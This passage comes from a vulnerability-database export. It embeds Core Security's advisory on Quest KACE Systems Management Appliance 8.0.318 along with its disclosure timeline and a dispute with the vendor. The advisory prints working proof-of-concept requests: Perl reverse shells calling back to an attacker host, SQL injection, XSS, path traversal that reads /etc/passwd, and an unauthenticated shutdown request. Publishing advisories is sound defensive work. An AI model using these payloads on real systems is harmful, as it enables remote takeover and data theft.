"url": "http://corelabs.coresecurity.com/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11139"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11134"
},
{
"trust": 0.1,
"url": "http://[serverip]/common/download_agent_installer.php?platform=windows\u0026serv=58b9e89c12f57e492df8f1d744b6ed5a4d394b454ca8a99176caba35fd13ec1f\u0026orgid=1"
},
{
"trust": 0.1,
"url": "http://[serverip]/systemui/settings_network.php"
},
{
"trust": 0.1,
"url": "https://support.quest.com/essentials/reporting-security-vulnerability."
},
{
"trust": 0.1,
"url": "http://[serverip]/adminui/advisory.php?id=10"
},
{
"trust": 0.1,
"url": "http://creativecommons.org/licenses/by-nc-sa/3.0/us/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11136"
},
{
"trust": 0.1,
"url": "http://www.coresecurity.com/files/attachments/core_security_advisories.asc."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11135"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11140"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11132"
},
{
"trust": 0.1,
"url": "https://www.quest.com/products/kace-systems-management-appliance/"
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com."
},
{
"trust": 0.1,
"url": "https://support.quest.com/essentials/vulnerability-reporting-acknowledgements)."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11141"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11142"
},
{
"trust": 0.1,
"url": "https://support.quest.com/download-install-detail/6086148."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11138"
},
{
"trust": 0.1,
"url": "http://[serverip]/adminui/analysis_report_list.php?category_id="
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11137"
},
{
"trust": 0.1,
"url": "http://[serverip]/common/run_cross_report.php?uniqueid=366314513\u0026id=585\u0026org=1\u0026fmt=xls34403\u0027)%3balert(1)%2f%2f952"
},
{
"trust": 0.1,
"url": "https://support.quest.com/kace-systems-management-appliance/kb/254193/security-vulnerability-patch-sec2018_20180410-"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15640"
},
{
"db": "VULMON",
"id": "CVE-2018-11133"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005408"
},
{
"db": "PACKETSTORM",
"id": "148005"
},
{
"db": "NVD",
"id": "CVE-2018-11133"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1221"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-15640"
},
{
"db": "VULMON",
"id": "CVE-2018-11133"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005408"
},
{
"db": "PACKETSTORM",
"id": "148005"
},
{
"db": "NVD",
"id": "CVE-2018-11133"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1221"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-08-20T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-15640"
},
{
"date": "2018-05-31T00:00:00",
"db": "VULMON",
"id": "CVE-2018-11133"
},
{
"date": "2018-07-17T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-005408"
},
{
"date": "2018-05-31T20:52:06",
"db": "PACKETSTORM",
"id": "148005"
},
{
"date": "2018-05-31T18:29:00.307000",
"db": "NVD",
"id": "CVE-2018-11133"
},
{
"date": "2018-06-01T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201805-1221"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-08-20T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-15640"
},
{
"date": "2018-06-28T00:00:00",
"db": "VULMON",
"id": "CVE-2018-11133"
},
{
"date": "2018-07-17T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-005408"
},
{
"date": "2018-06-28T17:20:33.277000",
"db": "NVD",
"id": "CVE-2018-11133"
},
{
"date": "2018-06-01T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201805-1221"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "148005"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1221"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Quest KACE System Management Appliance Cross-Site Scripting Vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15640"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1221"
}
],
"trust": 1.2
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XSS",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201805-1221"
}
],
"trust": 0.6
}
}
VAR-201805-0599
Vulnerability from variot - Updated: 2023-12-18 12:01The '/common/ajax_email_connection_test.php' script in the Quest KACE System Management Appliance 8.0.318 is accessible by any authenticated user and can be abused to execute arbitrary commands on the system. This script is vulnerable to command injection via the unsanitized user input 'TEST_SERVER' sent to the script via the POST method. Quest KACE Systems Management Appliance Contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. QuestKACESystemManagementAppliance provides comprehensive system management for all network connected devices. Core Security - Corelabs Advisory http://corelabs.coresecurity.com/
Quest KACE System Management Appliance Multiple Vulnerabilities
- Advisory Information
Title: Quest KACE System Management Appliance Multiple Vulnerabilities Advisory ID: CORE-2018-0004 Advisory URL: http://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities Date published: 2018-05-31 Date of last update: 2018-05-22 Vendors contacted: Quest Software Inc. Release mode: Forced release
- Vulnerability Information
Class: Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Deserialization of Untrusted Data [CWE-502], Improper Privilege Management [CWE-269], Improper Privilege Management [CWE-269], Improper Authorization [CWE-285], Improper Neutralization of Special Elements used in an SQL Command [CWE-89], Improper Neutralization of Special Elements used in an SQL Command [CWE-89], Improper Neutralization of Input During Web Page Generation [CWE-79], External Control of File Name or Path [CWE-73], External Control of File Name or Path [CWE-73] Impact: Code execution Remotely Exploitable: Yes Locally Exploitable: Yes CVE Name: CVE-2018-11138, CVE-2018-11139, CVE-2018-11135, CVE-2018-11134, CVE-2018-11132, CVE-2018-11142, CVE-2018-11136, CVE-2018-11140, CVE-2018-11133, CVE-2018-11137, CVE-2018-11141
- Vulnerability Description
From Quest KACE's website:
"The KACE Systems Management Appliance [1] provides your growing organization with comprehensive management of network-connected devices, including servers, PCs, Macs, Chromebooks, tablets, printers, storage, networking gear and the Internet of Things (IoT). KACE can fulfill all of your organization's systems management needs, from initial deployment to ongoing management and retirement."
Multiple vulnerabilities were found in the Quest KACE System Management Virtual Appliance that would allow a remote attacker to gain command execution as root. We present three vectors to achieve this, including one that can be exploited as an unauthenticated user.
Additional web application vulnerabilities were found in the web console that is bundled with the product. These vulnerabilities are detailed in section 7.
Note: This advisory has limited details on the vulnerabilities because during the attempted coordinated disclosure process, Quest advised us not to distribute our original findings to the public or else they would take legal action. Quest's definition of "responsible disclosure" can be found at https://support.quest.com/essentials/reporting-security-vulnerability.
CoreLabs has been publishing security advisories since 1997 and believes in coordinated disclosure and good faith collaboration with software vendors before disclosure to help ensure that a fix or workaround solution is ready and available when the vulnerability details are publicized. We believe that providing technical details about each finding is necessary to provide users and organizations with enough information to understand the implications of the vulnerabilities against their environment and, most importantly, to prioritize the remediation activities aiming at mitigating risk.
We regret Quest's posture on disclosure during the whole process (detailed in the Report Timeline section) and the lack of a possibility of engaging into a coordinated publication date, something we achieve (and have achieved) with many vendors as part of our coordinated disclosure practices.
- Vulnerable Packages
. Quest KACE System Management Appliance 8.0 (Build 8.0.318) Other products and versions might be affected too, but they were not tested.
- Vendor Information, Solutions and Workarounds
Quest reports that it has released the security vulnerability patch SEC2018_20180410 to address the reported vulnerabilities. Patch can be download at https://support.quest.com/download-install-detail/6086148.
For more details, Quest published the following Security Note: https://support.quest.com/kace-systems-management-appliance/kb/254193/security-vulnerability-patch-sec2018_20180410-
- Credits
These vulnerabilities were discovered and researched by Leandro Barragan and Guido Leo from Core Security Consulting Services. The publication of this advisory was coordinated by Leandro Cuozzo from Core Advisories Team.
- Technical Description / Proof of Concept Code
Quest KACE SMA ships with a web console that provides administrators and users with several features. Multiple vulnerabilities were found in the context of this console, both from an authenticated and unauthenticated perspective.
Section 7.1 describes how an unauthenticated attacker could gain command execution on the system as the web server user.
Vulnerabilities described in 7.2 and 7.3 could also be abused to gain code execution but would require the attacker to have a valid authentication token.
In addition, issues found in the Sudo Server module presented in 7.4 and 7.5 would allow the attacker to elevate his privileges from the web server user to root, effectively obtaining full control of the device.
Additional web application vulnerabilities were found in the console, such as insufficient authorization for critical functions, which would allow an anonymous attacker to reconfigure the appliance (7.6), SQL injection vulnerabilities (7.7, 7,8), a cross-site scripting issue (7.9), and path traversal vulnerabilities, which would allow an attacker to read, write and delete arbitrary files (7.9, 7.10, 7.11).
7.1.
The script receives the following parameters via the GET method:
. platform: Indicates the platform in which the agent is going to be installed . serv: SHA256 hash of a fixed value that depends of each appliance . orgid: Organization ID . version: Version number of the agent
The last two conditions are simple to meet. The Agent versions are publicly available within the Quest KACE site, but even if they were not, we found that the Organization ID parameter is vulnerable to a time based SQL injection (refer to issue 7.7). This would make it possible to obtain the agent version by querying the table 'CLIENT_DISTRIBUTION' and fetching the contents of the 'VERSION' column. The Organization ID is 1 by default, but could be obtained in the same way as the Agent version by querying the table 'ORGANIZATION' and the column 'ID'.
As stated above, the application uses the Organization ID and Agent version parameters to execute commands. This means we need to find a way to append system commands within the Organization ID, without breaking the SQL query. If we use the comment symbol (#), we can append anything we want without affecting the result of the query.
Preparing payload:
/----- - platform = windows - serv = ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c - orgid = 1#;perl -e 'use Socket;$i="[AttackerIP]";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'; - version = 8.0.152 (last agent version available for windows) -----/
The following proof of concept executes a reverse shell:
/----- GET /common/download_agent_installer.php?platform=windows&serv=ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c&orgid=1%23%3bperl+-e+'use+Socket%3b$i%3d"[AttackerIP]"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">%26S")%3bopen(STDOUT,">%26S")%3bopen(STDERR,">%26S")%3bexec("/bin/sh+-i")%3b}%3b'%3b&version=8.0.152 HTTP/1.1 Host: Server Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 0 -----/
/----- $ nc -lvp 8080 Listening on [0.0.0.0] (family 0, port 8080) Connection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2, sport 20050) sh: can't access tty; job control turned off $ id uid=80(www) gid=80(www) groups=80(www) -----/
7.2.
The following proof of concept executes a reverse shell:
/----- POST /common/ajax_email_connection_test.php HTTP/1.1 Host: [ServerIP] Accept: application/json, text/javascript, /; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 416 Cookie: [Cookie] Connection: close
TEST_SERVER=test;perl+-e+'use+Socket%3b$i%3d"[AttackerIP]"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">%26S")%3bopen(STDOUT,">%26S")%3bopen(STDERR,">%26S")%3bexec("/bin/sh+-i")%3b}%3b';&TEST_PORT=587&TEST_USERNAME=eaea@eaea.com&TEST_PASSWORD=1234&TEST_OLD_PASSWORD=&QUEUE_ID=1&TEST_TO_EMAIL=eaea@eaea.com&ACTION=TEST_CONNECTION_SMTP -----/
/----- $ nc -lvp 8080 Listening on [0.0.0.0] (family 0, port 8080) Connection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2, sport 20050) sh: can't access tty; job control turned off $ id uid=80(www) gid=80(www) groups=80(www) -----/
7.3.
To exploit this issue, the parameter 'ERROR_MESSAGES' needs to be an array and meet some specific conditions in order to successfully exploit the issue.
7.4. Privilege escalation via password change in Sudo Server
[CVE-2018-11134] In order to perform actions that requires higher privileges, the application relies on a message queue managed that runs with root privileges and only allows a set of commands.
One of the available commands allows to change any user's password (including root).
Assuming we are able to run commands in the server, we could abuse this feature by changing the password of the 'kace_support' account, which comes disabled by default but has full sudo privileges.
7.5. Privilege escalation via command injection in Sudo Server
[CVE-2018-11132] As mentioned in the issue [7.4], in order to perform actions that require higher privileges, the application relies on a message queue that runs daemonized with root privileges and only allows a set of commands to be executed.
7.6. Insufficient Authorization for critical function
[CVE-2018-11142] 'systemui/settings_network.php' and 'systemui/settings_patching.php' scripts are accessible only from localhost. This restriction can be bypassed by modifying the 'Host' and 'X_Forwarded_For' HTTP headers.
The following proof of concept abuses this vulnerability to shutdown the server as an anonymous user:
/----- POST /systemui/settings_network.php HTTP/1.1 Host: localhost X-Forwarded-For: ::1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://[ServerIp]/systemui/settings_network.php Content-Type: multipart/form-data; boundary=---------------------------5642543667001619951434940129 Content-Length: 3418 Connection: close Upgrade-Insecure-Requests: 1
-----------------------------5642543667001619951434940129 Content-Disposition: form-data; name="CSRF_TOKEN" -----------------------------5642543667001619951434940129 Content-Disposition: form-data; name="$shutdown" DoIt! Content-Disposition: form-data; name="save" Save -----------------------------5642543667001619951434940129-- -----/
7.7. Unauthenticated SQL Injection in download_agent_installer.php
[CVE-2018-11136] The 'orgID' parameter received by the '/common/download_agent_installer.php' script is not sanitized, leading to SQL injection. In particular, a blind time based type.
The following proof of concept induces a time delay:
/----- http://[ServerIP]/common/download_agent_installer.php?platform=windows&serv=58b9e89c12f57e492df8f1d744b6ed5a4d394b454ca8a99176caba35fd13ec1f&orgid=1 AND SLEEP(10)%23;&version=8.0.152 -----/
7.8. SQL Injection in run_report.php
[CVE-2018-11140] The 'reportID' parameter received by the '/common/run_report.php' script is not sanitized, leading to SQL injection. In particular, an error based type.
The following proof of concept retrieves the current database name:
/----- POST /common/run_report.php HTTP/1.1 Content-Length: 161 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Host: [ServerIP] Accept: text/html,application/xhtml xml,application/xml;q=0.9,/;q=0.8 Connection: close Referer: http://[ServerIP]/adminui/analysis_report_list.php?CATEGORY_ID= Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Cookie: [Cookie]
date=1516135247598&reportId=-3161+UNION+ALL+SELECT+CONCAT(0x7170706a71,IFNULL(CAST(DATABASE()+AS+CHAR),0x20),0x716a707171),NULL--+LhEx&reportName=&format=pdf -----/
/----- HTTP/1.1 200 OK Date: Thu, 08 Feb 2018 21:50:21 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Access-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key, x-kace-auth-signature, accept, origin, content-type Access-Control-Allow-Origin: * Access-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS X-KACE-Appliance: K1000 X-KACE-Host: [ServerIP] X-KACE-Version: 8.0.318 X-KBOX-WebServer: [ServerIP] X-KBOX-Version: 8.0.318 X-KACE-WebServer: [ServerIP] X-UA-Compatible: IE=9,EDGE Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform Content-Length: 3548 Connection: close Content-Type: text/html; charset=utf-8
[...SNIPPED...]
<![endif]-->Report Queued: qppjqORG1qjpqq<meta http-equiv='refresh' [...SNIPPED...] -----/
7.9. Unauthenticated Cross Site Scriting in run_cross_report.php
[CVE-2018-11133] The 'fmt' parameter of the '/common/run_cross_report.php' script is vulnerable to cross-site scripting.
The following proof of concept demonstrates the vulnerability:
/----- http://[ServerIP]/common/run_cross_report.php?uniqueId=366314513&id=585&org=1&fmt=xls34403')%3balert(1)%2f%2f952 -----/
7.10. Path traversal in download_attachment.php leading to arbitrary file read
[CVE-2018-11137] The 'checksum' parameter of the '/common/download_attachment.php' script can be abused to read arbitrary files with 'www' privileges. The following proof of concept reads the '/etc/passwd' file. No administrator privileges are needed to execute this script.
It is worth noting that there are several interesting files that can be read with 'www' privileges, such as all the files located in '/kbox/bin/koneas/keys/' and '/kbox/kboxwww/include/globals.inc', which contain plaintext passwords.
/----- http://[ServerIP]/common/run_cross_report.php?uniqueId=366314513&id=585&org=1&fmt=xls34403')%3balert(1)%2f%2f952 -----/
The following proof of concept demonstrates the vulnerability:
/----- GET /common/download_attachment.php?checksum=/../../../../../../../../../../../etc/passwd&filename= HTTP/1.1 Host: [ServerIP] Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: [Cookie] Connection: close Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK Date: Thu, 18 Jan 2018 17:18:19 GMT Server: Apache Cache-Control: must-revalidate, post-check=0, pre-check=0 Expires: -1 Pragma: public Content-Disposition: attachment; filename="" Content-Transfer-Encoding: Binary Content-Description: K1000 attachment Content-Length: 2400 Access-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key, x-kace-auth-signature, accept, origin, content-type Access-Control-Allow-Origin: * Access-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS X-KACE-Appliance: K1000 X-KACE-Host: k10000. X-KACE-Version: 8.0.318 X-KBOX-WebServer: k10000. X-KBOX-Version: 8.0.318 X-KACE-WebServer: k10000. X-UA-Compatible: IE=9,EDGE Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform Connection: close Content-Type: application/octet-stream
$FreeBSD: releng/11.0/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $
root::0:0:Charlie &:/root:/bin/csh daemon::1:1:Owner of many system processes:/root:/usr/sbin/nologin operator::2:5:System &:/:/usr/sbin/nologin bin::3:7:Binaries Commands and Source:/:/usr/sbin/nologin tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin[...SNIPPED...] -----/
7.11. Path traversal in advisory.php leading to arbitrary file creation/deletion
[CVE-2018-11141] The 'IMAGES_JSON' and 'attachments_to_remove[]' parameters of the '/adminui/advisory.php' script can be abused to write and delete files respectively. The following proof of concept creates a file located at '/kbox/kboxwww/resources/TestWrite' with the content 'Sarasa' (base64 encoded). Files can be at any location where the 'www' user has write permissions.
File deletion could be abused to delete '/kbox/kboxwww/systemui/reports/setup_completed.log' file. This file's existence defines if the appliance setup wizard is shown or not.
The following proof of concept demonstrates the vulnerability:
/----- POST /adminui/advisory.php?ID=10 HTTP/1.1 Host: [ServerIP] Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://[ServerIP]/adminui/advisory.php?ID=10 Content-Type: multipart/form-data; boundary=---------------------------2671551246366368501556269100 Content-Length: 1705 Cookie: [Cookie] Connection: close Upgrade-Insecure-Requests: 1
-----------------------------2671551246366368501556269100 Content-Disposition: form-data; name="CSRF_TOKEN"
99c2addf067719d6fc3ae32ded351f000af8efdd091f162baa2a34516cefecc741cb13a69c80554a9ba32908d1c683102d3455eac39bcafc8854f46a04b2044e -----------------------------2671551246366368501556269100 Content-Disposition: form-data; name="IMAGES_JSON"
{"/../../../resources/TestWrite":"aaaaaa,VGVzdENvbnRlbnQ="} -----------------------------2671551246366368501556269100 Content-Disposition: form-data; name="FARRAY[ID]" [...SNIPPED...] -----/
Taking advantage of 7.2 and 7.4 we are able to verify the file creation:
/----- [root@k10000 /kbox/kboxwww/resources]# ls -lha total 32 drwxr-xr-x 2 www wheel 512B Feb 9 20:40 . drwxr-xr-x 23 root wheel 512B Nov 14 18:29 .. -rw-r--r-- 1 www wheel 11B Feb 9 20:40 TestWrite -----/
-
Report Timeline 2018-02-26: Core Security (Core) sent an initial notification to Quest Software Inc. (Quest) via web form. 2018-03-05: Quest Support confirmed the receipt and requested additional information. 2018-03-12: Core Security sent a draft advisory including a technical description. 2018-03-16: Quest Support asked for the CVE-IDs. 2018-03-16: Core Security answered saying that the CVE-IDs are required once the vendor verifies the vulnerabilities. Additionally, Core Security requested a confirmation about the reported vulnerabilities and a tentative timescale to fix them. Finally, Core Security requested that Quest use Core's advisories-publication email address as the official communication hannel also copying the researchers behind this discovery. 2018-03-16: Quest Support thanked Core's reply and stated it will be in touch during the process. 2018-03-20: Quest Support informed that they had not yet received any updates from the engineering team and had requested one. 2018-03-21: Quest Support requested information about the KACE version used for reporting the issues and also Core's company name and information. 2018-03-21: Core replied with the affected version (that was included in the original draft advisory) and a link to the Core company website and the list of previous security advisories. 2018-03-21: Quest Support acknowledged the information provided. 2018-03-26: Quest's KACE product manager (PM) thanked Core for making it aware of the security issues found and the level of thoroughness and details provided. Quest specified it had fixes already in place for some of the issues. Quest's KACE PM asked for a conference call in order to understand more about Core's offerings for future engagements. Finally, Quest's KACE PM notified the work done by Core is in breach of its license agreement, and requested Core not to distribute the findings to the public, otherwise uest would take legal action. 2018-04-13: Quest's KACE PM sent a follow up email and informed that it made a hotfix to patch the reported vulnerabilities. Quest also requested a call meeting to understand future opportunities based on the Core's company capabilities. Finally, Quest asked for information about the researcher that found the vulnerabilities and a link of Core's choosing in order to be included in Quest's Acknowledgment page (https://support.quest.com/essentials/vulnerability-reporting-acknowledgements). 2018-04-16: Core answered email from 2018-03-26 stating the company is following standard practices with regards to coordinated vulnerability disclosure, and also sent detailed technical information about our findings at Quest's request. Core also mentioned Quest seems to be well versed in the disclosure process and expects vendors to coordinate with it prior to publication via Quest's vulnerability reporting process, and that Quest's legal threat appears to be in direct contradiction to the disclosure process that they encourage on their website. Finally, Core asked about Quest's intention to work collaboratively to address these vulnerabilities and to follow industry standard disclosure processes that involves publication of the vulnerabilities. 2018-04-17: Quest's KACE PM replied saying it is willing to collaborate and is looking forward to having a conversation over the phone in order to continue the next steps in its vulnerability process (forwarded email from 2018-04-13). 2018-04-17: Core thanked the answer and stated the willingness of keeping written communications between parties in order to better document the process and communicated the next steps of the process including: 1. Testing the fix (if vendor agrees), 2. Get CVE-IDs, 3. Get a Vendor's link to be included in the advisory and finally 4. Send final advisory version to vendor and coordinate publication date together. With regards to Quest's requests, Core provided the researchers names and URL of the advisory when it will be published. Finally, Core stated that the request for other Core company services could be forwarded to the Core services team if needed (and asked the right contact at Quest) but our intention is to keep that services request separate from the coordinated disclosure process. 2018-04-18: Quest Support informed that they had publicly made available patches for its customers and unilaterally closed the case. 2018-05-31: Advisory CORE-2018-0004 published.
-
References
[1] https://www.quest.com/products/kace-systems-management-appliance/
- About CoreLabs
CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber-attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.
- About Core Security
Core Security provides companies with the security insight they need to know who, how, and what is vulnerable in their organization. The company's threat-aware, identity amp; access, network security, and vulnerability management solutions provide actionable insight and context needed to manage security risks across the enterprise. This shared insight gives customers a comprehensive view of their security posture to make better security remediation decisions. Better insight allows organizations to prioritize their efforts to protect critical assets, take action sooner to mitigate access risk, and react faster if a breach does occur.
Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@coresecurity.com
- Disclaimer
The contents of this advisory are copyright (c) 2018 Core Security and (c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
- PGP/GPG Keys
This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201805-0599",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "kace system management appliance",
"scope": "eq",
"trust": 2.2,
"vendor": "quest",
"version": "8.0.318"
},
{
"model": "kace systems management appliance",
"scope": "eq",
"trust": 0.8,
"vendor": "quest",
"version": "8.0.318"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-10908"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005412"
},
{
"db": "NVD",
"id": "CVE-2018-11139"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1215"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:quest:kace_system_management_appliance:8.0.318:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-11139"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Core Security Technologies, Leandro Barragan, Guido Leo",
"sources": [
{
"db": "PACKETSTORM",
"id": "148005"
}
],
"trust": 0.1
},
"cve": "CVE-2018-11139",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
